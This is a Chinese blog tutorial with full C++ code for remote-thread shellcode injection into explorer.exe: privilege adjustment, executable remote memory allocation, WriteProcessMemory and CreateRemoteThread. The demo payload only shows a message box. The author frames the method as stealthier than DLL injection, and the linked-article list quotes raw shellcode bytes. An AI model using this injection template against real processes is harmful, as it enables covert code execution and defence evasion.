远程线程shellcode注入

最新推荐文章于 2024-08-15 17:40:52 发布
最新推荐文章于 2024-08-15 17:40:52 发布
阅读量2.2k 收藏 3
点赞数 1
分类专栏: R3下常见注入总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ndl1302732/article/details/83007391
版权

高手请飘过~~~~~~~~~~~~~~~~~~~~~~~~~~~

         前一篇文章,写到了利用远程线程注入DLL,其原理是利用LoadLibaray把DLL加载进去,这种方式注入简单,但是会在对方进程加载一个模块。人家用工具一看,多了个模块,就知道被搞了。。。

          今天写下用远程线程注入shellcode, 注入shellcode的难点是,注入的代码不能访问绝对地址。比如不能存在对全局变量的访问,不能调用API,因为你的代码注入到人家进程空间,相应的绝对地址,很可能不是一个全局变量,或者你要调用的API。关于shellcode更多的知识,需要自己去查找更多资料,我也只懂点皮毛,就不多说了。

           利用远程线程注入shellcode和注入dll的优缺点建议大家看这篇文章:

https://www.cnblogs.com/BoyXiao/archive/2011/08/11/2134367.html

 

          注入shellcode,原理很简单,在目标进程开辟一段空间,分别将shellcode写过去,这个写过去的shellcode就是远程线程要执行的代码,再将shellcode需要的参数写过去。那么写过去的这两段数据分别是CreateRemoteThread的第四个第五个参数。

         代码如下:代码中有几个函数,很常用,我放到DLL中了,所以这里你看不到实现,如果需要完整代码可以QQ844255657,或者百度一下,一个是提权代码,一个是根据进程名获取PID,网上一把大。另外计算shellcode的大小时,我是利用两个函数地址相减,获得shellcode的大小,我在IDA中看了下,这两个函数正好相邻,所以我就用两个地址相减。这不知道是不是巧合。需要特别之处的是,程序是64位的。不知道32位的是不是编译后两个函数不会相邻了。这个有懂得希望留言。另外在说下shellcode就是函数:DWORD WINAPI RemoteThreadProc(LPVOID lpParameter) 。 怕新手不懂多啰嗦一句。

 

// InjectCodeByRemoteThread.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <Windows.h>
#include <Psapi.h>

#include "D:\\VS\\DllToInject\\DllToInject\\Utils.h"
#pragma comment(lib, "D:\\VS\\DllToInject\\x64\\Release\\UtilDll.lib")


typedef int (* FUN_MessageBox)(
	HWND hWnd,          
	LPCTSTR lpText,     
	LPCTSTR lpCaption, 
	UINT uType          
);

typedef struct tagRemoteMsgBoxData{
	FUN_MessageBox pfn;
	CHAR lpText[MAX_PATH];
	CHAR lpCaption[MAX_PATH];
}REMOTE_MSG_BOX_DATA, *PREMOTE_MSG_BOX_DATA;


typedef DWORD(WINAPI * FUN_RemoteThreadProc)(LPVOID lpParameter);

DWORD WINAPI RemoteThreadProc(LPVOID lpParameter){
	PREMOTE_MSG_BOX_DATA pRemoteData = (PREMOTE_MSG_BOX_DATA)lpParameter;
	pRemoteData->pfn(NULL, pRemoteData->lpText, pRemoteData->lpCaption, MB_OK);
	return 1;
}


void FillRemoteMsgBoxData(PREMOTE_MSG_BOX_DATA pRemoteMsgBox){
	HMODULE  hUser32 = LoadLibrary("User32.dll");
	pRemoteMsgBox->pfn = (FUN_MessageBox)GetProcAddress(hUser32, "MessageBoxA");
	strcpy(pRemoteMsgBox->lpText, "this is content");
	strcpy(pRemoteMsgBox->lpCaption, "this is title");
	FreeLibrary(hUser32);
}


int _tmain(int argc, _TCHAR* argv[])
{
	
	
	//两个函数地址的差值就是shellcode代码的大小,可能会有一些多的对齐数据,但是不影响
	DWORD funcSize = (DWORD)FillRemoteMsgBoxData - (DWORD)RemoteThreadProc;
	printf("shellcode size =%d\n", funcSize);

	
	REMOTE_MSG_BOX_DATA remoteData = { 0 };
	FillRemoteMsgBoxData(&remoteData);

	
	if (!AdjustProcessTokenPrivilege()){
		MyOutputDebugString("提权失败\n");
	}

	DWORD dwPid = GetPidByName("explorer.exe");
	if (dwPid == 0){
		MyOutputDebugString("GetPidByName failed\n");
		return -1;
	}

	MyOutputDebugString("explorer.exe pid=%d\n", dwPid);

	HANDLE hProcess;
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

	if (hProcess == NULL)
	{
		MyOutputDebugString("打开进程失败!!!!");
		return -1;
	}

	//1.在远程进程中分配内存,可读可写可执行
	LPVOID pszRemoteBuffer = (char *)VirtualAllocEx(hProcess, NULL, USN_PAGE_SIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (pszRemoteBuffer == NULL)
	{
		MyOutputDebugString("申请远程空间失败");
		return -1;
	}

	//2.在远程申请的内存空间中写入shellcode
	SIZE_T dwWriten = 0;
	if (!WriteProcessMemory(hProcess, pszRemoteBuffer, RemoteThreadProc, funcSize, &dwWriten))
	{
		MyOutputDebugString("写入内存失败");
		return -1;
	}
	printf("shellcode write bytes:%d\n", dwWriten);


	//3.在远程申请的内存空间中写MessageBox的数据{函数地址,content , title}
	dwWriten = 0;
	if (!WriteProcessMemory(hProcess, (CHAR *)pszRemoteBuffer + funcSize, &remoteData, sizeof(remoteData), &dwWriten))
	{
		MyOutputDebugString("写入内存失败");
		return -1;
	}

	//4.创建远程线程
	DWORD dwThreadId = 0;
	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (FUN_RemoteThreadProc)pszRemoteBuffer, (CHAR *)pszRemoteBuffer + funcSize, 0, &dwThreadId);

	if (hThread == NULL)
	{
		MyOutputDebugString("创建远程线程失败 %d\n", GetLastError());
		return -1;
	}

	//5 等待远程线程退出,等待shellcode执行完毕
	DWORD exitCode = 0;
	DWORD dwRet = 0;
	WaitForSingleObject(hThread, INFINITE);
	dwRet = GetExitCodeThread(hThread, &exitCode);

	
	if (dwRet == 0){
		printf("GetExitCodeThread failed\n");
		return -1;
	}

	//6 检查退出码,如果退出码等于1,说明shellcode执行成功
	//为什么等于1执行成功,shellcode返回值是1啊
	if (exitCode == 1){
		printf("shell code execute success\n");
	}

	//释放内存,关闭句柄等
	VirtualFreeEx(hProcess, pszRemoteBuffer, USN_PAGE_SIZE, MEM_DECOMMIT);
	::CloseHandle(hThread);
	::CloseHandle(hProcess);

	return 0;
}

 

ndl1302732
关注
专栏目录
笔记:ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 553
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
远程线程注入 (滴水)
若面朝大海边竹妮春暖花开的博客
04-01 564
当创建一个线程的时候就是创建了一个线程的结构体 windows提供了一个函数,创建远程线程,允许你在别的进程创建线程 要先使用OpenProcess函数根据进程ID获得别的进程的句柄,在前面讲过,每个进程中有一个局部句柄表,里面都是在进程中打开的对象。操作系统有一个全局句柄表,也就是进程ID 要执行的线程函数是在目标进程的函数 如果可以在目标进程创建一个线程并执行自己进程的代码那就可以为...
InjectCode:远程线程注入DLL库,支持windows 32位和64位平台
06-26
注入代码 InjectCode 项目是一个支持 Windows 32 位和 64 位 DLL 远程线程注入库。 测试平台 视窗 8 x64 视窗 8 x32 视窗 7 SP1 x64 视窗 7 SP1 x32 视窗 2008 R2 视窗 2003 SP2 x64 视窗 2003 SP2 x32 Windows XP SP2 x64 Windows XP SP2 x32 工作原理 步骤 1. 通过进程名称查找目标进程。 step 2. 查找先后注入的进程。 setp 3.判断程序是否可以注入中位数。 setp 4. 创建一个远程线程注入到目标进程的dll。
远程线程注入shellcode笔记
weixin_30872789的博客
10-17 319
#include "stdafx.h" #include <windows.h> #include <stdio.h> char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12...
Shellcode Injection(√)
最新发布
qq_74259765的博客
08-15 1307
shellcode与 汇编相关内容
ShellCode的另外一种玩法(远程线程注入ShellCode)[by Anskya]
04-06 2221
 [原创]ShellCode的另外一种玩法(远程线程注入ShellCode)介于小弟技术菜,请各位大哥不要"奸笑"希望可以指点一二转载请保留版权:by Anskya这里是说将ShellCode代码直接注射到远程进程内部使她运行!以下代码全部使用TASM为原型编写(MASM不太适合,不能自定义PE结构,为了某某人说我抄袭和盗版pkXX大哥的FASM大作,我这里就使用国内很少用的TASM为原型
java远程线程注入_学习:远程线程实现DLL注入shellcode注入以及OD调试原理
weixin_36286567的博客
02-17 533
远程线程:#include#include//函数地址:00C31740int main() {HANDLE hThread;HANDLE hProcess;// 1、得到要在其进程中创建线程的进程句柄hProcess = OpenProcess(PROCESS_ALL_ACCESS,false,10940);if (hProcess == NULL) {OutputDebugString("Op...
Shellcode Injection
omnispace的博客
03-07 804
Introduction Here I am going to demonstrate how to gain shell access by overflowing a vulnerable buffer. I shall show it with both ASLR disabled as well as ASLR enabled(for those who don't know a
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
双击第三个输入框即可生成shellcode,这里默认的shellcode远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是...
易语言远程线程注入方法
01-04
易语言远程线程注入方法是一种在程序运行时将一段代码注入到另一个正在运行的进程中的技术。这种方法在软件开发、调试、性能优化以及恶意软件中都有应用。在易语言中,实现远程线程注入需要对操作系统底层机制和...
windows-CODE注入远程线程注入
08-14
3. **Shellcode注入**:直接将机器码写入目标进程,执行特定操作。 四、安全与防范 远程线程注入虽然有其合法用途,但也常被滥用在恶意软件中。因此,操作系统和安全软件都对此进行了防范: - **DEP(Data ...
linux下共享库的注入技术
05-05
CSDN上竟然没有搜到这个PPT,我就把这个共享上来吧。 好像linux上共享库注入的技术已经比较成熟了,但是没有很多人讨论。。。 相当于windows的hook技术一样。等我再仔细研究研究
ShellCode编写和远程代码注入
&Ψ的博客
09-15 1569
文章目录1.ShellCode是什么2.ShellCode的编写原则3.TEB与PEB1)TEB线程信息获取当前线程的TEB2)PEB进程环境块获取当前进程的TEBPEB_LDR_DATALDR_DATA_TABLE_ENTRY在任意进程中找到一个LDR_DATA_TABLE_ENTRY1.一些结构体的定义2.寻找方法4.ShellCode的实现思路5.远程注入代码6.关于我在vs2017编写时遇到的问题解决方法 1.ShellCode是什么 一段特殊的代码,不依赖与任何进程环境。简单来讲就是一段可以在Wi
Linux ShellCode远程攻击原理
For free
02-27 1953
这里就以exit 系统调用为例 首先编写C代码,在GDB中使用 disass _exit 反汇编exit 函数,之后迁移为汇编代码。 section .text global _start _start: xor eax, eax xor ebx, ebx mov al, 0x01 int 0x80 之后只用如下nasm 进行汇编, ld 进行连接,生成可执行文件nasm -f elf
推荐文章:利用Callback注入Shellcode的神奇工具 - Callback_Shellcode_Injection
gitblog_00058的博客
05-23 304
推荐文章:利用Callback注入Shellcode的神奇工具 - Callback_Shellcode_Injection 项目地址:https://gitcode.com/ChaitanyaHaritash/Callback_Shellcode_Injection 1. 项目介绍 Callback_Shellcode_Injection 是一个开源项目,专注于通过回调函数(Callbacks)...
ShellCode代码直接注射到远程进程内部
05-18 1467
这里说的是将ShellCode代码直接注射到远程进程内部使它运行! 以下代码全部使用TASM为原型编写(MASM不太适合,不能自定义PE结构,为了某某人说我抄袭和盗版pkXX大哥的FASM大作,我这里就使用国内很少用的TASM为原型来编写代码) 文章假定各位已经有了一定的编程基础 1.远程线程注入原理 先说说远程线程注入原理,以前我们编写远程注入代码的时候总是需要自己计算代码注
远程线程注入详解
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
05-13 868
远程线程注入详解 作者:黎伟鑫 一、 前言:     远程线程技术指的是通过在其他进程中创建新线程的方法进入该进程的内存地址空间,从而获得对该进程的控制权的方法。     在进程中可以通过CreateThread函数创建线程,被创建的新线程与主线程共享地址空间以及其他的资源。同样,通过CreateRemoteThread函数可以在其他进程内创建新线程,新创建的的远程线程
一文读懂远程线程注入
qq_53058639的博客
10-27 80
在红队行动中,红队的目的都是要在不暴露自身行动的前提下,向蓝队发动攻击。他们使用各种技术和程序来隐藏C2连接和数据流。攻击活动的第一步是获得初始访问权。他们会使用定制的恶意软件和有效载荷来躲避防杀软和EDR等防御工具。本文涉及知识点实操练习:[DLL注入型病毒实验](https://www.hetianlab.com/expc.do?wemedia)(通过实验了解DLL注入型病毒的攻击过程)进程注入是用来逃避防御机制的重要技术之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值